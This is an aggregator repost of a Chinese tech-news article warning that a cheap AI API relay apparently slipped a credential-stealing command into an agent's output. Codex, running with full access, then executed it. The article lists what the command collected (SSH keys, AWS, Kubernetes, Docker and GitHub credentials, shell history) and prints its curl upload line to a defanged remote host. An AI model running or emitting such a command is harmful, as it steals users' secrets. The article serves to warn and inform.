惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

V
V2EX
博客园 - 叶小钗
WordPress大学
WordPress大学
N
Netflix TechBlog - Medium
M
MIT News - Artificial intelligence
美团技术团队
aimingoo的专栏
aimingoo的专栏
博客园_首页
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
Microsoft Security Blog
Microsoft Security Blog
Last Week in AI
Last Week in AI
The GitHub Blog
The GitHub Blog
小众软件
小众软件
T
Tailwind CSS Blog
Martin Fowler
Martin Fowler
B
Blog RSS Feed
月光博客
月光博客
量子位
H
Hackread – Cybersecurity News, Data Breaches, AI and More
Hugging Face - Blog
Hugging Face - Blog
IT之家
IT之家
Y
Y Combinator Blog
B
Blog
MyScale Blog
MyScale Blog

小众软件

ntfsmac – 适用于苹果 M 芯片,开源 NTFS 读写工具(无需内核扩展或SIP修改) - 小众软件 Windows 11 时间点还原默认开启,真后悔药:可恢复系统与用户文件数据 - 小众软件 26/27 英超赛程日历,临时上线! - 小众软件 本周赛博领鸡蛋(8.21~8.27):《卡牌末日》《阿尔比恩在线》《沙漠房车漫游》 - 小众软件 superfile – 终端也需要一个好用的文件管理器 - 小众软件 Kan.bn – 开源看版(项目管理工具),Trello 替代方案 - 小众软件 99CDN:自建 CDN、智能调度与商业化运营的边缘加速平台 - 小众软件 芒果磁盘清理 / MangoDisk:开源,深度磁盘清理工具,轻量高颜值[macOS/Windows] - 小众软件 被吐槽多年的 Win11 右键菜单,终于变快了? - 小众软件 史前动物博物馆:和孩子一起看双语 3D 小博物馆,18 只恐龙 - 小众软件 让 Al Agent 看懂所有文档:将任何文档转换为统一的 Markdown 格式 - 小众软件 Flow – 在线开源 ePub 阅读器|如何制作 ePub 格式电子书 - 小众软件 在 Windows 上运行 Linux 到底有多简单? - 小众软件 发现频道:10款大家发现的好评软件[2026年第33期] - 小众软件 开源下载工具 Motrix 2.0.0 测试版发布,时隔 3 年再次更新,支持 AI Agent 控制下载 - 小众软件 微软兑现承诺:Windows 11 这几个月真的变好了吗? - 小众软件 LocalSend 时隔18个月更新,发布第一个 LocalSend CLI 版本,可通过命令行传输文件 - 小众软件 本周赛博领鸡蛋(8.14~8.20):《漫漫长路 沙巫之旅》、《旁观者:列车长》 - 小众软件 DeepSeek API 全面涨价,8月17日起,最高12倍涨幅 - 小众软件 DeepSeek 官方发布类 OpenClaw 工具:开源 Agent 框架 DeepSeek Harness - 小众软件 不用 NAS、不买硬盘,0成本拥有影视、小说、资源库 - 小众软件 蒸馏《基层中国的运行逻辑》后,让 AI 帮你分析求学、考公、投资与创业 - 小众软件 Mac 磁盘爆满不用慌,Mole 帮你一键深度释放空间! - 小众软件 Google Play 应用商店正式上架第一款「第三方应用商店 Aptoide Games」 - 小众软件 买不起硬盘了?清华大学开源软件镜像站移除 OpenWrt、Flutter、Anaconda、GitLab EE 4 款镜像 - 小众软件 Edge 也开始屏蔽旧扩展,uBlock Origin 将成为唯三无法迁移 MV3 的扩展之一 - 小众软件 发现频道:10款大家发现的好评软件[2026年第32期] - 小众软件 Windows 11 最近悄悄安装了OneDrive照片,还不能卸载? - 小众软件 让网页视频也能投到电视上播放:Castor - 小众软件 SepiaPod – 25年前 iPod Classic 复古音乐播放器,iPhone 限免 - 小众软件
有用户发现:AI 中转站除了掺水,还会投毒 - 小众软件
青小蛙 · 2026-08-11 · via 小众软件

V 站的用户昨日发帖称:某 AI 公益站点在开启 Full Access 权限后,AI Agent 生成的一段命令疑似包含环境信息收集与凭据读取行为。包括读取 SSH 私钥、aws 环境变量、API Key、GitHub Token、管理密码、环境变量、终端历史命令等内容,并向外传输。@Appinn

有用户发现:AI 中转站除了掺水,还会投毒 1

发生了什么?

有用户发现:AI 中转站除了掺水,还会投毒 2

命令解读

用户在使用中转站时,收到了以上的命令(AI 返回内容),并在拥有完整权限的 Codex 上执行了。

这段命令主要做了三件事:收集运行环境信息、扫描敏感配置文件、将结果发送到远程地址。

具体为:

1. 收集系统信息

读取:

  • Node / npm 版本
  • 主机名
  • 当前用户与权限
  • 当前目录
  • Linux 内核信息
  • 环境变量

用于获取当前运行环境的基本信息。

2. 搜索配置与认证信息

尝试读取:

  • cli-proxy-api 配置文件
  • config.yaml
  • auth-dir 认证目录

同时扫描:

  • ~/.ssh/:SSH 密钥与配置
  • ~/.aws/:AWS 凭据
  • ~/.kube/:Kubernetes 配置
  • ~/.docker/:Docker 登录信息
  • GitHub CLI 配置
  • npm、pip、Cloudflare 等工具配置

这些文件可能包含 API Key、Token、登录凭据等敏感信息。

3. 获取系统运行状态

收集:

  • Docker 容器信息
  • 当前运行进程
  • 网络端口
  • systemd 服务
  • Shell 历史记录

用于了解当前机器运行了哪些服务。

4. 上传收集结果

命令最后通过:

curl -s -X POST --data-binary @- https://proxy[.]jxtech.store/canary

是否可以确认是“投毒”?

虽然,以上命令有明显的投毒行为,但还有几个问题:

  1. 无法确认命令来源
  • AI 模型生成;
  • 用户编写的提示词诱导 AI 生成;
  • 某个插件或自定义模块中的脚本;
  • 其他上下文内容触发。

仅凭最终出现的命令,无法证明它一定来自站点后台或服务方。

  1. 无法确认执行链路

目前只能看到用户展示的命令内容,无法确认:

  • 命令是否真的执行;
  • 执行环境是什么;
  • 是否完整运行;
  • 上传请求是否成功。

所以,留下一个问题:有没有其他用户提供更完整的使用过程,系统提示词、用户指令等内容。

最后,中转站,尤其廉价中转站,请不要对其抱有幻想,默认泄漏 😭


原文:https://www.appinn.com/ai-agent-full-access-security-risk/